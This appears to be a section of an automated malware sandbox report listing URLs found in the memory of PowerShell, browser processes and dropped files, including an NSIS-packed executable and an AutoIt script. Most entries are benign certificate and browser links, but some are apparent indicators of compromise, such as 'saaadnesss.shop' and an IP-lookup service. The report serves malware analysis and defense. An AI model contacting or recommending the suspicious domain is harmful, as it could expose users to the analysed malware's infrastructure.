    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2133357506.00000241003BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmp, Passenger.13.dr, hyf04rot.rhn.exe.0.dr, Stopped.com.6.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
    Source: Convinced.13.dr, Stopped.com.6.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2133357506.00000241003BC000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0...U....0.?.a.tozzi
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, Passenger.13.dr, hyf04rot.rhn.exe.0.dr, Stopped.com.6.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G..U.
    Source: Convinced.13.dr, Stopped.com.6.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2133357506.00000241003BC000.00000004.00000800.00020000.00000000.sdmp, Passenger.13.dr, hyf04rot.rhn.exe.0.dr, Stopped.com.6.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G..U.
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G..U.
    Source: svchost.exe, 00000015.00000002.3267887217.00000239C8C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: qmgr.db.21.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: qmgr.db.21.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: powershell.exe, 00000000.00000002.2133357506.00000241021C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ifconfig.me
    Source: msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
    Source: chrome.exe, 00000014.00000003.2483659881.00001808010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483813623.00001808010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483719913.000018080100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483120374.0000180800FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110070000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe, 00000005.00000000.2103322238.0000000000408000.00000002.00000001.01000000.00000008.sdmp, hyf04rot.rhn.exe, 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2133357506.00000241003BC000.00000004.00000800.00020000.00000000.sdmp, Passenger.13.dr, hyf04rot.rhn.exe.0.dr, Stopped.com.6.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C..
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F..
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2133357506.00000241003BC000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U..U.
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103..U...
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;..
    Source: Convinced.13.dr, Stopped.com.6.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Passenger.13.dr, Convinced.13.dr, Stopped.com.6.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2133357506.00000241003BC000.00000004.00000800.00020000.00000000.sdmp, Passenger.13.dr, hyf04rot.rhn.exe.0.dr, Stopped.com.6.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606..U.../0-0
    Source: powershell.exe, 00000000.00000002.2133357506.0000024100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: chrome.exe, 00000014.00000003.2485998634.0000180801034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486741039.0000180801278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483659881.00001808010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486338332.0000180800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483813623.00001808010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2484968227.00001808009BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2485964191.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483719913.000018080100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483120374.0000180800FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483691316.0000180801120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
    Source: chrome.exe, 00000014.00000003.2485998634.0000180801034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486741039.0000180801278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483659881.00001808010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486338332.0000180800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483813623.00001808010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2484968227.00001808009BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2485964191.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483719913.000018080100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483120374.0000180800FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483691316.0000180801120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
    Source: chrome.exe, 00000014.00000003.2485998634.0000180801034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486741039.0000180801278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483659881.00001808010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486338332.0000180800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483813623.00001808010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2484968227.00001808009BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2485964191.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483719913.000018080100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483120374.0000180800FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483691316.0000180801120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
    Source: chrome.exe, 00000014.00000003.2485998634.0000180801034000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486741039.0000180801278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483659881.00001808010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486338332.0000180800438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483813623.00001808010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2484968227.00001808009BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2485964191.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483719913.000018080100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483120374.0000180800FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486637546.0000180801168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2483691316.0000180801120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
    Source: powershell.exe, 00000000.00000002.2133357506.000002410224A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://saaadnesss.shop
    Source: powershell.exe, 00000000.00000002.2133357506.0000024100001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A..U...:0806?4?2?0http://crl.globalsign.c
    Source: Convinced.13.dr, Stopped.com.6.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2133357506.00000241003BC000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?..
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2133357506.00000241003BC000.00000004.00000800.00020000.00000000.sdmp, Passenger.13.dr, hyf04rot.rhn.exe.0.dr, Stopped.com.6.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0...U.#..0.?.?.?i???WE93??
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, hyf04rot.rhn.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
    Source: powershell.exe, 00000000.00000002.2168196149.0000024110458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168196149.0000024110A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06..U.../0-0
    Source: powershell.exe, 00000000.00000002.2133357506.0000024100228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: Stopped.com, 00000011.00000000.2154994355.0000000000455000.00000002.00000001.01000000.0000000A.sdmp, Stopped.com.6.dr, Born.13.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: chromecache_493.22.drString found in binary or memory: http://www.broofa.com
    Source: chrome.exe, 00000014.00000003.2480395342.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2498532148.0000180800C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2486293493.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2509865774.0000180800C80000.00000004.00000800.00020000.00000000.sdmp, fcbaaa.17.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: chrome.exe, 00000014.00000003.2497483640.0000180801344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
    Source: chrome.exe, 00000014.00000003.2497483640.0000180801344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
    Source: chrome.exe, 00000014.00000003.2497483640.0000180801344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
    Source: chromecache_490.22.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
    Source: chromecache_490.22.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
    Source: chrome.exe, 00000014.00000003.2508949223.000018080160C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
    Source: powershell.exe, 00000000.00000002.2133357506.0000024100001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
    Source: chrome.exe, 00000014.00000003.2478382788.00001808009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2478353744.0000180800394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.2477584573.0000180800394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2607260828.00007A640036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2715884219.0000651000430000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001D.00000003.2716218878.0000651000444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
